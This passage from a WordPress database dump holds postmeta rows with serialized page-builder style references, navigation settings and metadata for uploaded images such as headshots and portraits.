855;i:127;i:860;i:128;i:861;i:129;i:862;i:130;i:828;i:131;i:829;i:132;i:830;i:133;i:831;i:134;i:832;i:135;i:833;i:136;i:835;i:137;i:842;i:138;i:843;i:139;i:844;i:140;i:910;i:141;i:911;i:142;i:912;i:143;i:913;i:144;i:914;i:145;i:915;i:146;i:917;i:147;i:912;i:148;i:918;i:149;i:914;i:150;i:915;i:151;i:919;i:152;i:912;i:153;i:920;i:154;i:914;i:155;i:915;i:156;i:921;i:157;i:912;i:158;i:922;i:159;i:914;i:160;i:915;i:161;i:923;i:162;i:912;i:163;i:913;i:164;i:914;i:165;i:915;i:166;i:917;i:167;i:912;i:168;i:913;i:169;i:914;i:170;i:915;i:171;i:917;i:172;i:912;i:173;i:913;i:174;i:914;i:175;i:915;i:176;i:917;i:177;i:912;i:178;i:913;i:179;i:914;i:180;i:915;i:181;i:912;i:182;i:913;i:183;i:914;i:184;i:915;i:185;i:917;i:186;i:912;i:187;i:913;i:188;i:914;i:189;i:915;i:190;i:917;i:191;i:924;i:192;i:925;i:193;i:926;}}}'),(2135,1640,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2136,1642,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2163,1650,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:200:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:984;i:64;i:985;i:65;i:986;i:66;i:846;i:67;i:847;i:68;i:848;i:69;i:854;i:70;i:850;i:71;i:851;i:72;i:902;i:73;i:855;i:74;i:848;i:75;i:849;i:76;i:850;i:77;i:851;i:78;i:901;i:79;i:853;i:80;i:848;i:81;i:856;i:82;i:850;i:83;i:851;i:84;i:852;i:85;i:857;i:86;i:848;i:87;i:854;i:88;i:850;i:89;i:851;i:90;i:902;i:91;i:855;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:855;i:104;i:848;i:105;i:854;i:106;i:850;i:107;i:851;i:108;i:902;i:109;i:855;i:110;i:848;i:111;i:854;i:112;i:850;i:113;i:851;i:114;i:902;i:115;i:855;i:116;i:848;i:117;i:854;i:118;i:850;i:119;i:851;i:120;i:902;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:860;i:134;i:861;i:135;i:862;i:136;i:828;i:137;i:829;i:138;i:830;i:139;i:831;i:140;i:832;i:141;i:833;i:142;i:835;i:143;i:842;i:144;i:843;i:145;i:844;i:146;i:910;i:147;i:911;i:148;i:912;i:149;i:913;i:150;i:914;i:151;i:915;i:152;i:917;i:153;i:912;i:154;i:918;i:155;i:914;i:156;i:915;i:157;i:919;i:158;i:912;i:159;i:920;i:160;i:914;i:161;i:915;i:162;i:921;i:163;i:912;i:164;i:922;i:165;i:914;i:166;i:915;i:167;i:923;i:168;i:912;i:169;i:913;i:170;i:914;i:171;i:915;i:172;i:917;i:173;i:912;i:174;i:913;i:175;i:914;i:176;i:915;i:177;i:917;i:178;i:912;i:179;i:913;i:180;i:914;i:181;i:915;i:182;i:917;i:183;i:912;i:184;i:913;i:185;i:914;i:186;i:915;i:187;i:912;i:188;i:913;i:189;i:914;i:190;i:915;i:191;i:917;i:192;i:912;i:193;i:913;i:194;i:914;i:195;i:915;i:196;i:917;i:197;i:924;i:198;i:925;i:199;i:926;}}}'),(2164,1652,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2165,1654,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2174,1658,'_wp_attached_file','2023/10/282038166_2492815234187345_4129762528023780269_n.jpg'),(2175,1658,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:60:\"2023/10/282038166_2492815234187345_4129762528023780269_n.jpg\";s:8:\"filesize\";i:133973;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"282038166_2492815234187345_4129762528023780269_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23641;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"282038166_2492815234187345_4129762528023780269_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7410;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"282038166_2492815234187345_4129762528023780269_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116347;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2176,1659,'_wp_attached_file','2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg'),(2177,1659,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:524;s:6:\"height\";i:524;s:4:\"file\";s:83:\"2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\";s:8:\"filesize\";i:151249;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:83:\"cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22654;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:83:\"cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7415;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"cropped-282038166_2492815234187345_4129762528023780269_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115729;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2178,1659,'_oembed_eec85ce16d0f5bbc1def8c7dcb7b9cdd','{{unknown}}'),(2179,1659,'_edit_lock','1697142696:1'),(2180,1659,'_edit_last','1'),(2181,1659,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:959;s:6:\"height\";i:959;s:4:\"file\";s:60:\"cropped-282038166_2492815234187345_4129762528023780269_n.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:68:\"cropped-282038166_2492815234187345_4129762528023780269_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7370;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:68:\"cropped-282038166_2492815234187345_4129762528023780269_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23369;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:68:\"cropped-282038166_2492815234187345_4129762528023780269_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115729;}}'),(2182,1661,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:200:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:984;i:64;i:985;i:65;i:986;i:66;i:846;i:67;i:847;i:68;i:848;i:69;i:854;i:70;i:850;i:71;i:851;i:72;i:902;i:73;i:855;i:74;i:848;i:75;i:849;i:76;i:850;i:77;i:851;i:78;i:901;i:79;i:853;i:80;i:848;i:81;i:856;i:82;i:850;i:83;i:851;i:84;i:852;i:85;i:857;i:86;i:848;i:87;i:854;i:88;i:850;i:89;i:851;i:90;i:902;i:91;i:855;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:855;i:104;i:848;i:105;i:854;i:106;i:850;i:107;i:851;i:108;i:902;i:109;i:855;i:110;i:848;i:111;i:854;i:112;i:850;i:113;i:851;i:114;i:902;i:115;i:855;i:116;i:848;i:117;i:854;i:118;i:850;i:119;i:851;i:120;i:902;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:860;i:134;i:861;i:135;i:862;i:136;i:828;i:137;i:829;i:138;i:830;i:139;i:831;i:140;i:832;i:141;i:833;i:142;i:835;i:143;i:842;i:144;i:843;i:145;i:844;i:146;i:910;i:147;i:911;i:148;i:912;i:149;i:913;i:150;i:914;i:151;i:915;i:152;i:917;i:153;i:912;i:154;i:918;i:155;i:914;i:156;i:915;i:157;i:919;i:158;i:912;i:159;i:920;i:160;i:914;i:161;i:915;i:162;i:921;i:163;i:912;i:164;i:922;i:165;i:914;i:166;i:915;i:167;i:923;i:168;i:912;i:169;i:913;i:170;i:914;i:171;i:915;i:172;i:917;i:173;i:912;i:174;i:913;i:175;i:914;i:176;i:915;i:177;i:917;i:178;i:912;i:179;i:913;i:180;i:914;i:181;i:915;i:182;i:917;i:183;i:912;i:184;i:913;i:185;i:914;i:186;i:915;i:187;i:912;i:188;i:913;i:189;i:914;i:190;i:915;i:191;i:917;i:192;i:912;i:193;i:913;i:194;i:914;i:195;i:915;i:196;i:917;i:197;i:924;i:198;i:925;i:199;i:926;}}}'),(2183,1663,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2184,1665,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2257,1682,'_wp_attached_file','2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg'),(2258,1682,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:219;s:6:\"height\";i:219;s:4:\"file\";s:66:\"2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\";s:8:\"filesize\";i:7376;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4291;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2259,1682,'_oembed_6fa5cfb097b1f5d0cf78fc6d560110ee','{{unknown}}'),(2260,1684,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:211:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:984;i:64;i:985;i:65;i:986;i:66;i:846;i:67;i:847;i:68;i:848;i:69;i:854;i:70;i:850;i:71;i:851;i:72;i:902;i:73;i:855;i:74;i:848;i:75;i:849;i:76;i:850;i:77;i:851;i:78;i:901;i:79;i:853;i:80;i:848;i:81;i:856;i:82;i:850;i:83;i:851;i:84;i:852;i:85;i:857;i:86;i:848;i:87;i:854;i:88;i:850;i:89;i:851;i:90;i:902;i:91;i:855;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:848;i:104;i:854;i:105;i:850;i:106;i:851;i:107;i:902;i:108;i:855;i:109;i:848;i:110;i:854;i:111;i:850;i:112;i:851;i:113;i:902;i:114;i:855;i:115;i:848;i:116;i:854;i:117;i:850;i:118;i:851;i:119;i:902;i:120;i:855;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:848;i:134;i:854;i:135;i:850;i:136;i:851;i:137;i:902;i:138;i:855;i:139;i:860;i:140;i:861;i:141;i:862;i:142;i:828;i:143;i:829;i:144;i:830;i:145;i:831;i:146;i:832;i:147;i:833;i:148;i:835;i:149;i:830;i:150;i:831;i:151;i:832;i:152;i:833;i:153;i:835;i:154;i:842;i:155;i:843;i:156;i:844;i:157;i:910;i:158;i:911;i:159;i:912;i:160;i:913;i:161;i:914;i:162;i:915;i:163;i:917;i:164;i:912;i:165;i:918;i:166;i:914;i:167;i:915;i:168;i:919;i:169;i:912;i:170;i:920;i:171;i:914;i:172;i:915;i:173;i:921;i:174;i:912;i:175;i:922;i:176;i:914;i:177;i:915;i:178;i:923;i:179;i:912;i:180;i:913;i:181;i:914;i:182;i:915;i:183;i:917;i:184;i:912;i:185;i:913;i:186;i:914;i:187;i:915;i:188;i:917;i:189;i:912;i:190;i:913;i:191;i:914;i:192;i:915;i:193;i:917;i:194;i:912;i:195;i:913;i:196;i:914;i:197;i:915;i:198;i:912;i:199;i:913;i:200;i:914;i:201;i:915;i:202;i:917;i:203;i:912;i:204;i:913;i:205;i:914;i:206;i:915;i:207;i:917;i:208;i:924;i:209;i:925;i:210;i:926;}}}'),(2261,1686,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2262,1688,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2267,1690,'_wp_attached_file','2023/10/IMG_9249.jpg'),(2268,1690,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1037;s:4:\"file\";s:20:\"2023/10/IMG_9249.jpg\";s:8:\"filesize\";i:249325;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG_9249-289x300.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19700;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG_9249-987x1024.jpg\";s:5:\"width\";i:987;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108205;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_9249-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10915;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG_9249-768x796.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73136;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"iPhone 12 Pro Max\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1682286750\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.5\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2289,1696,'_wp_attached_file','2022/03/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg'),(2290,1696,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:86:\"2022/03/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\";s:8:\"filesize\";i:158132;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D850\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1634662262\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2291,1696,'_oembed_79852ca1990a4c2b625595643f1489dc','{{unknown}}'),(2292,1696,'_edit_lock','1697202081:1'),(2293,1696,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:63:\"cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2.jpg\";}s:18:\"full-1697201683992\";a:3:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:78:\"cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201668992.jpg\";}}'),(2294,1696,'_edit_last','1'),(2295,1697,'_wp_attached_file','2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg'),(2296,1697,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:94:\"2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\";s:8:\"filesize\";i:38912;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:94:\"cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28334;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D850\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1634662262\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2297,1697,'_oembed_79852ca1990a4c2b625595643f1489dc','{{unknown}}'),(2298,1698,'_wp_attached_file','2023/09/cropped-Portrait-1-2.jpeg'),(2299,1698,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:420;s:6:\"height\";i:414;s:4:\"file\";s:33:\"2023/09/cropped-Portrait-1-2.jpeg\";s:8:\"filesize\";i:29739;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"cropped-Portrait-1-2-300x296.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15073;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"cropped-Portrait-1-2-150x150.jpeg\";s:5: